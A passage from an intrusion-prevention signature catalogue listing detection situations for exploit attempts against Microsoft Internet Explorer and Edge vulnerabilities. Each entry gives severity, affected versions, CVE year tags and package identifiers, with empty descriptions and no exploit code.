Tags: Windows, Any Hardware, Internet Explorer, CVE2016, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1794-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: Microsoft-Internet-Explorer-And-Edge-Memory-Corruption-CVE-2016-3297
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-And-Edge-Substring-New-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Microsoft Edge, CVE2018, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Microsoft-Internet-Explorer-And-Edge-Substring-New-Out-Of-Bounds-Read
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-And-Sharepoint-toStaticHTML-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, Microsoft Office SharePoint Server 2007, Microsoft SharePoint Services, MS2010-10, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1036-5242
Last changed: sgpkg-ips-1036-5242
Vulnerability: Microsoft-Internet-Explorer-And-Sharepoint-toStaticHTML-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Animatemotion-Properties-Assignment-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2008-02, CVE2008, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-586-5211
Vulnerability: Microsoft-Internet-Explorer-Animatemotion-Properties-Assignment-Vulnerability
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Array-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, MS2015-08, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-673-5211
Last changed: sgpkg-ips-673-5211
Vulnerability: Microsoft-Internet-Explorer-Array-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Arraybuffer.slice-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-10, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-697-5211
Vulnerability: Microsoft-Internet-Explorer-Arraybuffer.slice-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-ASLR-Bypass-CVE-2015-6088

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-11, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6088
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Asynchronous-Null-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2012-08, CVE2012, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-489-5211
Vulnerability: Microsoft-Internet-Explorer-Asynchronous-Null-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Attribute-Removal-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, MS2012-07, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Attribute-Removal-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Attribute-Value-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2016-06, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-774-5211
Vulnerability: Microsoft-Internet-Explorer-Attribute-Value-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Body-Element-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2011-10, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: Microsoft-Internet-Explorer-Body-Element-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Body-Replace-Memory-Corruption-CVE-2015-6150

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, MS2015-12, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-711-5211
Vulnerability: Microsoft-Internet-Explorer-Body-Replace-Memory-Corruption-CVE-2015-6150
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-BrowseDialog-ActiveX-Control-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, CVE2007, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-BrowseDialog-ActiveX-Control-Denial-of-Service
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Cattrarray-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-12, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Vulnerability: Microsoft-Internet-Explorer-Cattrarray-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CElement-Memory-Corruption

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-CElement-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CElement-Memory-Corruption-2

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 10
Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-513-5211
Last changed: sgpkg-ips-1503-5242
Vulnerability: Microsoft-Internet-Explorer-CElement-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Center-Element-Out-Of-Bounds-Array-Indexing

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2012-06, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-826-5242
Vulnerability: Microsoft-Internet-Explorer-Center-Element-Out-Of-Bounds-Array-Indexing
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CFormElement-Use-After-Free-Vulnerability

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2012-11, CVE2012, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-491-5211
Vulnerability: Microsoft-Internet-Explorer-CFormElement-Use-After-Free-Vulnerability
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Cgeneratedcontent-Unwrapcontent-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-03, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-1435-5242
Vulnerability: Microsoft-Internet-Explorer-Cgeneratedcontent-Unwrapcontent-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CGenericElement-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, MS2013-05, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-523-5211
Vulnerability: Microsoft-Internet-Explorer-CGenericElement-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CHTML-Use-After-Free-CVE-2013-0028

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2013-02, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-509-5211
Vulnerability: Microsoft-Internet-Explorer-CHTML-Use-After-Free-CVE-2013-0028
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Clipboard-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-12, CVE2014, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Microsoft-Internet-Explorer-Clipboard-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2009-02, CVE2009, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption-Exploit

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, MS2009-02, CVE2009, Windows not specific, Internet Explorer not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-cloneNode-Use-After-Free

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-09, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-480-5211
Last changed: sgpkg-ips-480-5211
Vulnerability: Microsoft-Internet-Explorer-cloneNode-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Code-Execution-SA2757760

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-09, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-479-5211
Vulnerability: Microsoft-Internet-Explorer-Code-Execution-SA2757760
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Code-Execution-SA2757760-2

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-09, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-479-5211
Vulnerability: Microsoft-Internet-Explorer-Code-Execution-SA2757760
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Col-Element-Heap-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-06, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: Microsoft-Internet-Explorer-Col-Element-Heap-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption

About this situation: CLSID of an illegal COM object detected
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Internet Explorer 6.0, CVE2006, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-Microsoft-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Copy-And-Paste-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-02, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1036-5242
Last changed: sgpkg-ips-1036-5242
Vulnerability: Microsoft-Internet-Explorer-Copy-And-Paste-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Cpastecommand-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, MS2013-02, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Microsoft-Internet-Explorer-Cpastecommand-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Createrange-Cross-Domain-Scripting

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-10, CVE2008, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1332-5242
Vulnerability: Microsoft-Internet-Explorer-Createrange-Cross-Domain-Scripting
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Cross-Domain-Disclosure-CVE-2010-3330

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-10, CVE2010, Windows not specific, Potential Disclosure
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Cross-Domain-Information-Disclosure-CVE-2010-3330
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Cross-Domain-JavaScript-Injection

About this situation: An attempt to exploit a Microsoft Internet Explorer Cross-Domain JavaScript Injection vulnerability detected.
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Internet Explorer, CVE2015, Any Operating System not specific, Internet Explorer not specific, Potential Disclosure
First detected in: sgpkg-ips-766-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Cross-Domain-JavaScript-Injection
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Cross-Frame-Scripting-Restriction-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer 5.0, Internet Explorer 6.0, CVE2004, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-998-5242
Vulnerability: Microsoft-Internet-Explorer-Cross-Frame-Scripting-Restriction-Bypass
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3243

About this situation: An attempt to exploit a cross-site scripting vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer 8.0, MS2010-10, CVE2010, Windows not specific, Potential Disclosure
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3243
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3324

About this situation: An attempt to exploit a cross-site scripting vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer 8.0, MS2010-10, CVE2010, Windows not specific, Potential Disclosure
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3324
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CSS-Tag-Handling-Memory-Corruption

About this situation: Memory corruption exploit against Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, MS2007-06, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Microsoft-Internet-Explorer-CSS-Tag-Handling-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Cstr-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-867-5242
Last changed: sgpkg-ips-867-5242
Vulnerability: Microsoft-Internet-Explorer-Cstr-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Ctablecell-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer 9.0, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Microsoft-Internet-Explorer-Ctablecell-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Ctablecolcalc-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-09, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-682-5211
Last changed: sgpkg-ips-682-5211
Vulnerability: Microsoft-Internet-Explorer-Ctablecolcalc-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Ctitleelement-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2014-10, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Microsoft-Internet-Explorer-Ctitleelement-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CTreePos-Use-After-Free

About this situation: An attempt to exploit vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, MS2013-09, CVE2013, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Microsoft-Internet-Explorer-CTreePos-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CTreePos-Use-After-Free-Vulnerability

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2012-11, CVE2012, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-491-5211
Vulnerability: Microsoft-Internet-Explorer-CTreePos-Use-After-Free-Vulnerability
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CTxtPtr-Memory-Access-Error

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer 11.0, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-649-5211
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-CTxtPtr-Memory-Access-Error
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2010-3971

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-02, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-559-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2010-3971
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2010-3971-2

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-02, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2010-3971
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2010-3971-3

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-02, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-494-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2010-3971
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2010-3971-4

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-02, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2010-3971
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2010-3971-5

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-02, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Microsoft-Internet-Explorer-CVE-2010-3971
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2013-3163-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-07, CVE2013, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-548-5211
Last changed: sgpkg-ips-548-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2013-3163-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2013-3184-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, MS2013-08, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-543-5211
Last changed: sgpkg-ips-543-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2013-3184-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2013-3203-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, MS2013-09, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2013-3203-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2013-3205-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2013-09, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-543-5211
Last changed: sgpkg-ips-543-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2013-3205-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2014-0274-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows RT 8.1, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-02, CVE2014, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-571-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2014-0274-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2014-0275-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
